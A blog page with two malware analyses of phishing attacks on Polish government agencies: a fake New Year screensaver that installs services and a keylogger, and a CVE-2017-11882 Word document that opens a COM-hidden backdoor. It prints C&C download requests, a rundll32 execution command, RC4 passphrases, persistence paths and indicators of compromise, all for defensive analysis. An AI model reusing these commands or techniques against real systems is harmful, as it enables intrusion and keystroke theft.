niedziela, 18 marca 2018

Happy New Year wishes from China

At the end of January 2018 one of government agencies in Poland received an email with new year’s wishes from one of Chinese government agency. The content of the email is definitely suspicious so we decided to perform deeper analysis of this attempt of attack.


First of all we have to understand an email header. The received entries are the most important part of email because received lines contain a list of all hosts through which the message travelled. We can notice that the real source IP address of sender is 39.109.6.203. So probably the misconfiguration of one of Chinese server permitted to spoof an email address of a sender.

Received: from WIN-RME55NNMJCN (unknown [39.109.6.203])
    by mail1.***.gov.cn (c) with ESMTPA id 68AA921190
    for <***.gov.pl>; Wed, 31 Jan 2018 09:54:39 +0800 (HKT)


The next step was to analyse attached rar archive file. It was composed only of one file named Happy 2018.scr. After execution we can see a nice picture with wishes (presented at the beginning of this article).
JPG file is stored in a resource section .rsrc of the scr file. Malware often stores an embedded program or configuration ata in this section. API function names were obfuscated but finally we noticed that to handle resource objects the following API calls were used: FreeResource(), LockResource(), LoadResource(), FindResourceA(), SizeOfResource().


In the same time malware reads SYSTEM\CurrentControlSet\Services\disk\Enum registry key. It is known trick to detect virtual machines.


By using LoadLibraryA() and GetProcAddress() APIs other API functions are resolved: OpenServiceA(), StartServiceA(), OpenSCManagerA(), QueryServiceStatus(), ControlService(), CloseServiceHandle(), CreateServiceA(), RegOpenKeyExA(), RegCloseKey(), RegSetValueExA(), RegQueryValueA(), RegCreateKeyA(), RegEnumValueA().
If malware does not detect virtual machine, new service will be installed. The service name is Avriax with description Multiple defender service with one windows service. The following execution command is added to Windows registers: %SystemRoot%\system32\svchost -k Avriax. A dll file is a second stage malware. It is copied from BIN resource section of scr file. This file is encrypted by using RC4 algorithm with passphrase “ULoveVas”. After installation the service is started immediately.

00402A97  |. FF15 70504000  CALL DWORD PTR DS:[405070]               ;  ADVAPI32.OpenSCManagerA
00402A9D  |. 8BF8           MOV EDI,EAX
00402A9F  |. 85FF           TEST EDI,EDI
00402AA1  |. 74 32          JE SHORT Happy_20.00402AD5
00402AA3  |. 8B4424 08      MOV EAX,DWORD PTR SS:[ESP+8]
00402AA7  |. 56             PUSH ESI
00402AA8  |. 68 10000100    PUSH 10010
00402AAD  |. 50             PUSH EAX
00402AAE  |. 57             PUSH EDI
00402AAF  |. FF15 74504000  CALL DWORD PTR DS:[405074]               ;  ADVAPI32.OpenServiceA
00402AB5  |. 8BF0           MOV ESI,EAX
00402AB7  |. 85F6           TEST ESI,ESI
00402AB9  |. 74 12          JE SHORT Happy_20.00402ACD
00402ABB  |. 6A 00          PUSH 0
00402ABD  |. 6A 00          PUSH 0
00402ABF  |. 56             PUSH ESI
00402AC0  |. FF15 80504000  CALL DWORD PTR DS:[405080]               ;  ADVAPI32.StartServiceA


Malware connects to C&C server and downloads another file - 30_1.exe. Info.hangro.net has the same IP address 39.109.6.203.

GET /session/manager?mode=0&id=JWXswTgi0184796 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: info.hangro.net
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Disposition: attachment; filename="robots.txt"
Content-Type: application/x-msdownload
Content-Length: 10
Date: Wed, 31 Jan 2018 18:29:18 GMT

30_1.exe
GET /session/manager?mode=30_1.exe&id=JWXswTgi0184796 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: info.hangro.net
Cache-Control: no-cache


Downloaded file is also encrypted by using RC4 algorithm. The passphrase is “Higaisakora.0”. After decrypting executable file is executed by using CreateProcessA() API from the following location C:\Windows\TEMP directory. All strings in this file are encoded. The decoding instructions are presented below:


On below example we can see another decoded window service name. The second service will be installed by new malware file.


The functionality of exe file is easily identified by looking at decoded API names.


Executable file contains also new resource – one more dll file. This time malicious dll library is not encrypted. We can use CFF Explorer to extract new library.


The dll file is store in C:\Users\<username>\AppData\Roaming\System\hpptx386.dll and new service named HP Printer Software is created. This is the last stage of infection.
DLL file is a keylogger. All data are stored in Info.dat file and send to C&C host vachel.vicp.cc [IP: 39.109.6.203].There are several methods of implementing keyloggers in Windows. Method used in described example is based on GetAsyncKeyState() and GetKeyState(). Mentioned functions are used to query the status of all keys.


Basic IoC are listed below:
  • (Happy 2018 .scr) SHA1: 511F7BC170C596AD1A26D616359A78851EB7881B
  • (Avriax32.dll) SHA1: 2FB33BF79BCACA2445F66769C5261037C2EF92E2
  • (30_1.exe - encrypted) SHA1: 82BAC0B378285F914C518F39F54DA3E4A7A54588
  • (decrypted) SHA1: F372CE319060F103714D0F8897F846452786BB31
  • (hpptx386.dll) SHA1: 83B995717F82F97D3A65C7E6FBFB59908EEDE811
  • 39.109.6.203
  • info.hangro.net
  • vachel.vicp.cc

sobota, 13 stycznia 2018

An example of static analysis of an APT malware


This article describes how to perform static analysis of suspicious file with use of a few tools like Oletools, IDA and RetDec.

Few weeks ago, an email with suspicious attachment had been sent to one of government agency in Poland. The attached file name is BG Presidency Draft Calendar-Final.doc.

SHA1 of the doc file is: 601367EED1DDC8473F99CAAA4E2673C13E5D30D7

The first step is to verify the content of the doc file. One of the tool which we usually use at Prevenity is Oletools. It is a package of python tools to analyse Microsoft OLE2 files.


The RTFOBJ tool extracted for us ole objects. One of it (#2) contains command cMD /c rundll32 “%temp%\osk.exe”,Start. Now, we know that the entry point is the Start function from the osk.exe file (dll file).
We can also notice that class name for this object is Equation.3. The part of dumped object is presented below.


The exploit (CVE-2017-11882) used in this doc file is related to the executable module EQNDT32.EXE (Microsoft Equation Editor). 

Note: We can easily confirm that Equation editor was used by analysing output from process monitor.


Let's come back to static analysis. The another OLE object (#0) is executable file, but it is the dll – not the exe file.

SHA1 of extracted dll file: D9276ED0D9370CE08970F869591E93185D3D022C

A few weeks ago Avast did great job by sharing the source code of the RetDec decompiler. Let’s use it to perform the initial analysis of our PE binary file. 

The first interesting notice is that the malware tries to hide communication with C&C by using COM technology. The COM allows malware developers to start and perform http communication with use of iexplore.exe process where the session is hidden. The malware  is using a few interesting functions: CoInitialize() and CoCreateInstance(). The first is used to initialize the COM library. The second function is used to create an object of the class associated with a specified CLSID.


The registry value confirms that malware creates an instance of Internet Explorer.
The malware collects and then sends in HTTP GET to C&C server some basic information about an infected host like hostname, username and operating system type. This data are encrypted by using simple formula. Subtract 0x41 from current letter and XOR with counter. 



Then such encrypted data are coded by Base64. The RetDec in comment provided information about identified base64 function.


The response from C&C server contains in body message a value parameter. The value of this parameter contains encrypted data (commands to execute) which must be decrypted by below code.


In next step malware tries to find the following characters „~~”. In this way commands from C&C server are extracted. Next few instructions are responsible for checking if command id contains only numbers between 0-9 and space as a separator.


We can identify few conditions which redirect code to execute commands, read files, delete files. All content sent to C&C server is encrypted by session symetric key.


One of the feature is executing commands at compromised machines. The results are stores in fw1ei.tmp file. 


As we can see wsprintfA() is used to prepare a final command. The first parameter of wsprintfA() is located a few lines above:

*(char *)(v3 | 2) = *(char *)((int32_t)"Cm" + 2);

By concatenating „Cm”  with „D” malware builds command cmd and add destination executable file name received from C&C server.

Depending on command the result is sent to one of below URLs:
  • http://%s/view.aspx?li=%s
  • http://%s/post.aspx?fs=%s
  • http://%s/li.aspx?id=%s
  • http://%s/query.aspx?q=%s

Some IoC are presented below:

C&C server: maps.fakemediavis.com
IP address: 115.144.238.67
Created files:
  • C:\Users\<username>\AppData\Roaming\mozilla\mozlib.dll
  • C:\Users\<username>\AppDadta\Local\Temp\Microsoft Office Update.lnk with content: C:\Windows\system32\rundll32.exe C:\Users\IEUser\AppData\Roaming\mozilla\mozlib.dll,Start
SHA1 Hash values:
  • 601367EED1DDC8473F99CAAA4E2673C13E5D30D7
  • D9276ED0D9370CE08970F869591E93185D3D022C

External links: